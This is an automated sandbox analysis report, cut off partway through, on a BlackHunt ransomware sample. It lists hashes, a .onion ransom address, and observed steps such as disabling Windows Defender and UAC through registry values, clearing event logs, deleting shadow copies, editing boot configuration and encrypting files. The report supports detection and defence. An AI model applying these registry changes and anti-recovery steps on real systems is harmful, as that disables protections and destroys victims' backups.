Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:59
Static task
static1
Behavioral task
behavioral1
Sample
33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe
Resource
win10v2004-20231222-en
General
-
Target
33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe
-
Size
707KB
-
MD5
293f7fa7bc9ab84f9f201e545976f60b
-
SHA1
fe3c4d1f3d27558f99b8d57a459880a80476ba7f
-
SHA256
33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa
-
SHA512
1b27b8288bebaaa7d65c266118b19f900a6d8d01d4c5880ec64ee389969593761071c4819aafb54445759fc82751a4ebcedf048a0c4aa8ddaa0a8ae4ef45dc1e
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1u8avnh:6uaTmkZJ+naie5OTamgEoKxLWN0h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5868 fsutil.exe 8476 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 7884 wevtutil.exe 3584 wevtutil.exe 4584 wevtutil.exe 8960 wevtutil.exe 12656 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5668 bcdedit.exe 6088 bcdedit.exe 10056 bcdedit.exe 10584 bcdedit.exe -
Renames multiple (3363) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 6536 wbadmin.exe 2232 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\G: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\J: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\N: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\E: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\T: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\I: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\O: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\Z: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\R: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\P: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\H: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\L: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\V: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\S: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\K: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\X: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\B: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\W: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened (read-only) \??\A: 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\directshow.md 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-hover.svg 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ko_get.svg 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons.png 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\#BlackHunt_ReadMe.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\dnsns.jar 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\#BlackHunt_ReadMe.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\ui-strings.js 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-fr\#BlackHunt_ReadMe.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\#BlackHunt_ReadMe.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\spectrum_spinner.svg 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-tw\#BlackHunt_ReadMe.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\ui-strings.js 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluCCFilesEmpty_180x180.svg 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr.gif 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\#BlackHunt_ReadMe.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\#BlackHunt_ReadMe.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-gb\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files\Java\jre-1.8\legal\jdk\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\#BlackHunt_ReadMe.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\#BlackHunt_ReadMe.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\plugin.js 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\ir.idl 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\ui-strings.js 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\#BlackHunt_ReadMe.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\#BlackHunt_ReadMe.hta 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\AppStore_icon.svg 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ar-ae\#BlackHunt_ReadMe.txt 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\#BlackHunt_Private.key 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7024 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 8440 vssadmin.exe 9488 vssadmin.exe 8120 vssadmin.exe 8108 vssadmin.exe 8096 vssadmin.exe 11416 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 7496 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 7748 PING.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe Token: SeRestorePrivilege 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe Token: SeBackupPrivilege 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe Token: SeTakeOwnershipPrivilege 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe Token: SeAuditPrivilege 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe Token: SeSecurityPrivilege 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe Token: SeIncBasePriorityPrivilege 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe Token: SeBackupPrivilege 5920 vssvc.exe Token: SeRestorePrivilege 5920 vssvc.exe Token: SeAuditPrivilege 5920 vssvc.exe Token: SeBackupPrivilege 15096 wbengine.exe Token: SeRestorePrivilege 15096 wbengine.exe Token: SeSecurityPrivilege 15096 wbengine.exe Token: SeSecurityPrivilege 7884 wevtutil.exe Token: SeBackupPrivilege 7884 wevtutil.exe Token: SeSecurityPrivilege 4584 wevtutil.exe Token: SeBackupPrivilege 4584 wevtutil.exe Token: SeSecurityPrivilege 3584 wevtutil.exe Token: SeBackupPrivilege 3584 wevtutil.exe Token: SeSecurityPrivilege 12656 wevtutil.exe Token: SeBackupPrivilege 12656 wevtutil.exe Token: SeSecurityPrivilege 8960 wevtutil.exe Token: SeBackupPrivilege 8960 wevtutil.exe Token: SeDebugPrivilege 7496 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 756 wrote to memory of 4928 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 102 PID 756 wrote to memory of 4928 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 102 PID 756 wrote to memory of 1080 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 142 PID 756 wrote to memory of 1080 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 142 PID 756 wrote to memory of 4564 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 98 PID 756 wrote to memory of 4564 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 98 PID 756 wrote to memory of 4576 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 97 PID 756 wrote to memory of 4576 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 97 PID 756 wrote to memory of 4120 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 99 PID 756 wrote to memory of 4120 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 99 PID 4928 wrote to memory of 4940 4928 cmd.exe 104 PID 4928 wrote to memory of 4940 4928 cmd.exe 104 PID 756 wrote to memory of 2892 756 33bf7ced4468a4da8df12880362176afff1e25c8ef4fe1d53f6fb430b2c558aa.exe 105 PID 756 